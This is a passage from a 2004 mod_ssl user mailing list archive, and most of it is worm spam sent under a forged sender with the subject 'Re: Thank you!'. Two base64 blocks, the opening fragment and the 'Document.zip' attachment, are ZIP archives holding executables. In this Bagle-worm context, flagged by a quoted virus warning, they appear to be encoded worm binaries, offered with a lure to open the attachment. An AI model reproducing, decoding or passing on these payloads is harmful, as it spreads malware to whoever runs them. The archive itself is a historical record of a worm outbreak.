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

----------kmkvqkhsabcmenkvexeh--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 15 18:03:33 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 85407A89E6; Mon, 15 Mar 2004 18:03:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from auemail2.firewall.lucent.com (auemail2.lucent.com [192.11.223.163])
	by master.modssl.org (Postfix) with ESMTP id DE9C7A895E
	for ; Mon, 15 Mar 2004 18:03:29 +0100 (CET)
Received: from ir0012ltmuppi2.com (h135-86-221-52.lucent.com [135.86.221.52])
	by auemail2.firewall.lucent.com (Switch-2.2.8/Switch-2.2.8) with SMTP id i2FH3Nc29392
	for ; Mon, 15 Mar 2004 11:03:23 -0600 (CST)
Date: Mon, 15 Mar 2004 17:03:22 +0000
To: modssl-users@modssl.org
Subject: Re: Thank you!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------hcraqsgbgfebcpymawug"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------hcraqsgbgfebcpymawug
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

------------------  Virus Warning Message (on the network)

Found virus PE_BAGLE.P-O in file text_document.pif
The file text_document.pif is moved to /var/spool/quarantine/virPAZqX_Z8v.

This is a machine-generated message, please do not reply via email. If you have questions, please contact the Lucent Help Desk at +1 888 300 0770.

---------------------------------------------------------

----------hcraqsgbgfebcpymawug
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


Please,  have a  look  at the attached  file.






----------hcraqsgbgfebcpymawug
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


------------------  Virus Warning Message (on the network)

text_document.pif is removed from here because it contains a virus.

---------------------------------------------------------
----------hcraqsgbgfebcpymawug--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 16 12:40:12 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 41797A8958; Tue, 16 Mar 2004 12:40:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from XP.net (pool-68-160-199-47.ny325.east.verizon.net [68.160.199.47])
	by master.modssl.org (Postfix) with SMTP id F3C20A8938
	for ; Tue, 16 Mar 2004 12:40:08 +0100 (CET)
Date: Tue, 16 Mar 2004 06:40:06 -0500
To: modssl-users@modssl.org
Subject: Re: Thank you!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------fxwfsemtnbpdplxxsfkr"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------fxwfsemtnbpdplxxsfkr
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------fxwfsemtnbpdplxxsfkr
Content-Type: image/gif; name="ahqksebuoe.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="ahqksebuoe.gif"
Content-ID: 

R0lGODlhdQAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB1AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqPNhiRpSOqzZi/KiwRRSPMwQ+AznwSscZLf7la9GRZL5n
MEM+9CiwWgudIil2TLjtJ0Gc1XzG+rctCtB/1aIsHbiqRbV/Th/SbBkzKEWSCH1uI3goisAZ
paBaJRhrxlWuAoc6PDmQrsxVJwON/VfKY8hth0yuAtwV6dlAPbtEeTYwZ9p/hwL5TIm1K9UZ
e4xipUxy1YxAV3TiDTRDJ06BUd423Ap1BmPIV/NFQRwoZtFVgczmQxv1Kt6QPq8Gr+YW9dp/
z1LHchmXMtUW+aKGhNn8X1W1vltsizq1NvOHLjtq/x747BD13Ifeki71tmhal4jNjwWNGvG/
FlcG7uFsWWGULv98Z1ddABLUAoB4bTOTagzhd1BT05lVTRcmdRFdbZ9dVZZPK830mF12UWdc
dQ3GxJpJBX03EIq1nWWWQ6yl2FWM2+C0R08rIYYTSeJ192IL9oH1zx4v8sTQFQCWFddjBBY0
A4AiqsjQgATVFh1PZeXjXlljAcnUSSGtdMVewx3nYE9uTUbic9EZNZxUfKVEXEilXBHdYtal
dttO/Q1UTSBdxCKXZz/lYx1NTOYm3Gds7RHIa5URhJtP+UVK0DZ9SeanXwJtU1WgnfbVhWo7
PuXVqaim2pxHH9HkkUkwzS0AE6w1xfqRS7N+9CquNNHkkksftRpFsLK2CquxMJ2E0q2v9upq
r8UiS+xBAQEAOw==

----------fxwfsemtnbpdplxxsfkr
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"

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
